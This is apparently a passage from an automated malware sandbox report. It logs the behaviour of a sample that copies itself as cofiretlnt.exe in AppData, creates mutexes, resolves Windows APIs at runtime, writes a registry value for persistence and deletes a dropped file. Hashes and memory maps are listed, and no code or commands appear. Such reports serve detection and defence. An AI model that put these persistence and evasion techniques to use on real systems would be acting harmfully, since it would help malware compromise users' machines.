| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7624eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x762314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76235929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x762314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x762311c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x76253102 |
|
1 | |
| Create Mapping | C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe | filename = C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
System (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2018-11-26 15:53:48 (UTC) |
|
3 | |
| Get Time | type = Ticks, time = 163052 |
|
2 | |
| Get Time | type = Ticks, time = 164066 |
|
1 | |
| Get Time | type = Ticks, time = 165080 |
|
1 | |
| Get Time | type = Ticks, time = 166094 |
|
1 | |
| Get Time | type = Ticks, time = 167108 |
|
1 | |
| Get Time | type = Ticks, time = 168122 |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 |
Mutex (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEM89C |
|
1 | |
| Create | mutex_name = Global\I705BA84C |
|
1 | |
| Create | mutex_name = Global\M705BA84C |
|
1 | |
| Release | mutex_name = Global\I705BA84C |
|
1 |
Process #9: cofiretlnt.exe
29
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:02:05, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8b0 |
| Parent PID | 0x8d0 (c:\users\aetadzjz\appdata\local\temp\bgd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
6E4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00060000 | 0x000c6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000e7fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x00208fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00228fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0024ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00257fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x00927fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x00ab0fff | Pagefile Backed Memory | r |
|
|
|
- |
| bgd.exe | 0x00b00000 | 0x00b22fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x01f2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f30000 | 0x021fefff | Memory Mapped File | r |
|
|
|
- |
| esent.dll | 0x74420000 | 0x745c2fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
Module (23)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x75a10000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76220000 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x3ef754 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3ef61c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3ef66c |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x3ef6cc |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3ef6cc |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x3ef6cc |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x3ef6cc |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x75a19894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x75a19cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77e4e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x762d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x762311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76231700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76231809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x762317ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7624eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x762314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76235929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x762314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x762311c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x76253102 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-26 15:53:53 (UTC) |
|
3 |
Process #10: cofiretlnt.exe
92
24
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:04, Reason: Child Process |
| Unmonitor | End Time: 00:03:25, Reason: Self Terminated |
| Monitor Duration | 00:01:21 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8dc |
| Parent PID | 0x8b0 (c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
730
0x
2B4
0x
3F4
0x
79C
0x
664
0x
8E4
0x
574
0x
278
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00077fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x000fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00118fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0021ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00227fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00220fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00270000 | 0x002d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004b8fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004dffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x004e7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x004e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x004f7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x004f0000 | 0x004f0fff | Memory Mapped File | r |
|
|
|
- |
| index.dat | 0x004f0000 | 0x004fbfff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00501fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x00510000 | 0x00517fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x006b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x00840fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x009cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x0092efff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x00930000 | 0x0093ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000940000 | 0x00940000 | 0x00940fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x00940fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x0098ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000950000 | 0x00950000 | 0x00950fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000960000 | 0x00960000 | 0x00960fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000970000 | 0x00970000 | 0x0097ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000970000 | 0x00970000 | 0x00978fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000970000 | 0x00970000 | 0x00977fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000980000 | 0x00980000 | 0x0098ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x009cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x00acffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x00ad8fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x00ad7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| bgd.exe | 0x00b00000 | 0x00b22fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x01f2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f30000 | 0x021fefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002200000 | 0x02200000 | 0x0225ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002260000 | 0x02260000 | 0x0229ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000022a0000 | 0x022a0000 | 0x0232ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002330000 | 0x02330000 | 0x023cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002330000 | 0x02330000 | 0x023affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023c0000 | 0x023c0000 | 0x023cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023e0000 | 0x023e0000 | 0x024dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025a0000 | 0x025a0000 | 0x025dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002610000 | 0x02610000 | 0x0264ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002660000 | 0x02660000 | 0x0269ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026a0000 | 0x026a0000 | 0x0279ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027e0000 | 0x027e0000 | 0x0281ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028c0000 | 0x028c0000 | 0x029bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029f0000 | 0x029f0000 | 0x02a2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a80000 | 0x02a80000 | 0x02b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b80000 | 0x02b80000 | 0x02d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b90000 | 0x02b90000 | 0x02bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02ccffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d00000 | 0x02d00000 | 0x02dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e40000 | 0x02e40000 | 0x02f3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f40000 | 0x02f40000 | 0x030dffff | Private Memory | rw |
|
|
|
- |
| esent.dll | 0x74420000 | 0x745c2fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x74f60000 | 0x74f64fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x74f70000 | 0x74fabfff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x74fb0000 | 0x75009fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x75010000 | 0x751adfff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x75350000 | 0x75357fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75360000 | 0x7536dfff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x75370000 | 0x75375fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x75380000 | 0x7538ffff | Memory Mapped File | rwx |
|
|
|
- |
| sensapi.dll | 0x75390000 | 0x75395fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x753a0000 | 0x753acfff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x753b0000 | 0x753c4fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x753d0000 | 0x75421fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x75430000 | 0x75436fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x75440000 | 0x7545bfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x75460000 | 0x754a3fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x754b0000 | 0x754eafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x754f0000 | 0x75505fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x75510000 | 0x7551cfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75520000 | 0x75536fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x75a00000 | 0x75a02fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76450000 | 0x76484fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77df0000 | 0x77df5fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat | 48.00 KB |
MD5:
0d7742564c1bf905226155ddc8801d2b
SHA1: 72fd26e88b22a795f79e85703fb4a6ce40a994e0 SHA256: 91425e000a3385e9c11c19ed0756d6add1f6e049de221c21c9b49873ecb278da SSDeep: 48:qHv5Jyik0i5HXWyAl7UGAnwniGhAnwwoSHXl16YSYP5lPrCoNqK5B5NA+KNi3bR/:qH7EH3WyBcaUMz3P5s+XA8dRTwLDP |
|
|
| c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat | 32.00 KB |
MD5:
b25ed5680eaebd743130ba81c6fa3e7f
SHA1: bdd244a2878fce8ddd7b97a1ae4ed6dc6f38bd17 SHA256: cd34c6d5341fa3554bf696d02934877f38e196bdef1d30720a53f923892b7779 SSDeep: 12:qjUXZ4OE32Y3XckQslQKy3gTLPrOLWlrOu933ekIQ3rIQbq93ILtrOLWlrOR:qjU6AXkQwQc3rOirOwekIyrIUZrOirO |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat | 64.00 KB |
MD5:
aa73bb41169e256d8b7474a877e2769e
SHA1: 12fd08f88e61c39c3a4fdf33ded0f2e39ab574cc SHA256: 8dab0f4e33fd26484b86817ec85078b8bfb9d2b0149463451ab0e0e4d2950b69 SSDeep: 96:qvzEMiozzcwjQ2ubh9NdeigWEsw4BtygPkxF0v33kp2uDPpGueVV9KWEFBiDXtgO:YzV8TUsEsJ9yMgBfE |
|
|
Host Behavior
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe | - |
|
1 |
Registry (1)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Write Value | - | value_name = cofiretlnt, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe", size = 134, type = REG_SZ |
|
1 |
Module (25)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x75a10000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76220000 |
|
1 | |
